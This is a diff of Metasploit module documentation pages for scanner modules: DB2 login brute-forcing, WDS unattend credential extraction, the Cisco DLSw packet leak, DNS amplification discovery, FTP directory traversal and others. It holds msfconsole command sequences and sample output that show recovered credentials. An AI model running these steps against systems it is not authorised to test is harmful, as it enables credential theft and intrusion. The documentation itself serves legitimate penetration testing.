   [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning...
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP:
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  UAMs: Cleartxt Passwrd, DHX2
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Signature: 975394e16633312406281959287fcbd9
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548   UTF8 Server Name: ubuntu
   [*] 1.1.1.1:548 - Scanned 1 of 1 hosts (100% complete)
   [*] Auxiliary module execution completed

documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
 
 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).

documentation/modules/auxiliary/scanner/db2/db2_auth.md

@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_auth)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_auth`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+    ```
+    msf > use auxiliary/scanner/db2/db2_auth
+    msf auxiliary/scanner/db2/db2_auth) > show options
+    msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1
+    msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass
+    msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb
+    msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2
+    msf auxiliary/scanner/db2/db2_auth) > run
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: )
+      [*] 172.17.0.2:50000      - Login Successful: db2inst1:db2pass
+      [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+      [*] Auxiliary module execution completed
+    ```

documentation/modules/auxiliary/scanner/db2/db2_version.md

@@ -0,0 +1,27 @@
+## Vulnerable Application
+
+This module queries a DB2 instance information.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_version)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_version`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+  ```
+  msf > use auxiliary/scanner/db2/db2_version
+  msf auxiliary(scanner/db2/db2_version) > show options
+  msf auxiliary(scanner/db2/db2_version) > set DATABASE testdb
+  msf auxiliary(scanner/db2/db2_version) > set RHOSTS 172.17.0.2
+  msf auxiliary(scanner/db2/db2_version) > run
+    [+] 172.17.0.2:50000      - 172.17.0.2:50000 DB2 - Platform: QDB2/LINUXX8664, Version: SQL11050, Instance: db2inst1, Plain-Authentication: OK
+    [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/db2/discovery.md

@@ -1,5 +1,5 @@
 
-## About
+## Description
 
 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`
 
-
 ## Scenarios
-- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run

documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md

@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/dcerpc/windows_deployment_services) and pull request [PR #1420](https://github.com/rapid7/metasploit-framework/pull/1420).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dcerpc/windows_deployment_services`
+  3. set RHOST [ip]
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Windows Server 2008 R2 X64
+
+  ```
+  msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > run
+
+    [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
+    [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
+    [*] Sending X64 Client Unattend request ...
+    [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
+    [+] Retrieved wds credentials for X64
+    [*] Sending X86 Client Unattend request ...
+    [*] Sending IA64 Client Unattend request ...
+
+      Windows Deployment Services
+      ===========================
+
+      Architecture  Type  Domain        Username  Password
+      ------------  ----  ------        --------  --------
+      X64           wds   Fabrikam.com  username  my_password
+
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/discovery/empty_udp.md

@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+Detect UDP services that reply to empty probes.
+
+More information can be found on the [Rapid7 blog page](https://blog.rapid7.com/2014/10/03/adventures-in-empty-udp-scanning/)
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/discovery/empty_udp`
+3. Do: `set RHOSTS [ip]`
+4. Do: `set RPORT [port]`
+5. Do: `run`
+
+## Scenarios
+
+### A run against Windows XP (X64) using Kali Linux 2019.3
+
+  ```
+  msf auxiliary(scanner/dns/dns_amp) > use auxiliary/scanner/discovery/empty_udp
+  msf auxiliary(scanner/discovery/empty_udp) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/discovery/empty_udp) > set RPORT 135
+    RPORT => 135
+  msf auxiliary(scanner/discovery/empty_udp) > run
+    [*] Sending 1032 empty probes to 1.1.1.1->1.1.1.1 (1 hosts)
+    [+] Received #52 from #:135:#1095/udp
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.md

@@ -0,0 +1,26 @@
+## Vulnerable Application
+
+This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/dlsw/dlsw_leak_capture`
+3. Do: `set RHOSTS [ip]`
+4. Do: `run`
+
+## Scenarios
+
+### IOS version 12.4(8) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
+    RHOSTS => 192.168.0.1
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
+    [*] 192.168.0.1:2067      - Checking for DLSw information disclosure (CVE-2014-7992)
+    [+] 192.168.0.1:2067      - Vulnerable to DLSw information disclosure; leaked 72 bytes
+    [*] 192.168.0.1:2067      - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
+    [*] 192.168.0.1:2067      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dns/dns_amp.md

@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.
+
+BIND 9.4.1-P1: [source](ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz)
+Ubuntu 7.10: [Gutsy Gibbon](http://old-releases.ubuntu.com/releases/7.10/)
+
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dns/dns_amp`
+  3. Do: `set DOMAINNAME [domain]`
+  4. Do: `set RHOST [ip]`
+  5. Do: `run`
+
+## Scenarios
+
+### A run on Ubuntu 7.10 (Gutsy Gibbon) and BIND 9.4.1-P1
+
+  ```
+  msf > use modules/auxiliary/scanner/dns/dns_amp
+  msf auxiliary(scanner/dns/dns_amp) > set DOMAINNAME domain.com
+    DOMAINNAME => domain.com
+  msf auxiliary(scanner/dns/dns_amp) > set RHOSTS 192.168.10.254
+    RHOSTS => 192.168.10.254
+  msf auxiliary(scanner/dns/dns_amp) > run
+    [*] Sending DNS probes to 192.168.10.254->192.168.10.254 (1 hosts)
+    [*] Sending 70 bytes to each host using the IN ANY domain.com request
+    [+] 192.168.10.254:53 - Response is 374 bytes [5.34x Amplification]
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md

@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.
 
 By default, anonymous access is allowed by the FTP server.
 
-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:
 
@@ -22,6 +22,6 @@ The FTP server IP address.
 
 The file you wish to download. Assume this path starts from C:\
 
-## Demonstration
+## Scenarios
 
 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)